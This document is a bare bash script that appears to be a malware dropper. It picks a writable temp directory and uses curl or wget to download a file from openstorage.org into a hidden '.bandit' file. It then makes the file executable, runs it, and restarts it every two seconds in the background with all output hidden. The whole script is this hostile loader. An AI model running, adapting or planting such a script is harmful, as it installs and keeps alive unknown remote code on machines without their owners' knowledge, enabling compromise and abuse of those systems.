#!/bin/bash
(

if [ -w '/dev/shm' ]; then
  export dir='/dev/shm'
elif [ -w '/var/tmp' ]; then
  export dir='/var/tmp'
elif [ -w '/tmp' ]; then
  export dir='/tmp'
fi

if [ "$(command -v curl)" ] > /dev/null; then
  export mo1_command="curl -s -o ${dir}/.bandit"
elif [ "$(command -v wget)" ] > /dev/null; then
  export mo1_command="wget -q -O ${dir}/.bandit"
else
  exit
fi 

while true; do
     if [ ! -f "$d/.java/jar.cbx" ]; then
      ${mo1_command} https://openstorage.org/leia
      chmod a+x ${dir}/.bandit
     fi

     if ! pgrep -f '.bandit' > /dev/null; then 
       cd ${dir} && ./.bandit
     fi
     sleep 2
done
) &>/dev/null &
